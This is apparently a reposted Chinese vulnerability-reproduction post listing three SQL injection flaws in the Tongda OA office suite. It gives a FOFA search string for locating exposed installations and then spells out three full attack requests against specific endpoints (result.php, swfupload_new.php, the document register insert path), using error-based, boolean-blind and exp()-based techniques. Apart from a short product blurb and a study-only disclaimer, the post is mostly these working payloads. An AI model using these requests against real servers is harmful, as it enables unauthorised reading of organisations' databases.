0x01 阅读须知
利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
(一) 通达OA
通达OA(Office Automation)是一款企业级协同办公软件,旨在为企业提供高效、便捷、安全、可控的办公环境。它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实现随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。通达OA广泛应用于各类企业,帮助企业实现数字化转型,提高管理效率和竞争力。
fofa语法:
app="TDXK-通达OA"
(二) 漏洞详情
GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),md5(123456),1,1)a%20from%20information_schema.tables%20group%20by%20a)b)%23 HTTP/1.1Host:User-Agent:Mozilla/5.0(Windows NT10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77Safari/537.36
(2) tongda-v115-swfupload_new-sqli:
POST /general/file_folder/swfupload_new.php HTTP/1.1Host:User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2Accept-Encoding: gzip------------GFioQpMK0vv2Content-Disposition: form-data; name="ATTACHMENT_ID"1------------GFioQpMK0vv2Content-Disposition: form-data; name="ATTACHMENT_NAME"1------------GFioQpMK0vv2Content-Disposition: form-data; name="FILE_SORT"2------------GFioQpMK0vv2Content-Disposition: form-data; name="SORT_ID"0 RLIKE (SELECT(CASEWHEN(substr(database(),{i},1)={ej})THEN1ELSE0x28END))------------GFioQpMK0vv2--
(3) tongda-v116-insert-sqli:
POST /general/document/index.php/recv/register/insertHTTP/1.1Host:User-Agent:Mozilla/5.0(Windows NT10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type:application/x-www-form-urlencodedAccept-Encoding: gziptitle)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
原文始发于微信公众号(SCA御盾):【漏洞复现】(nday)3个通达OA-sql注入复现集合
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论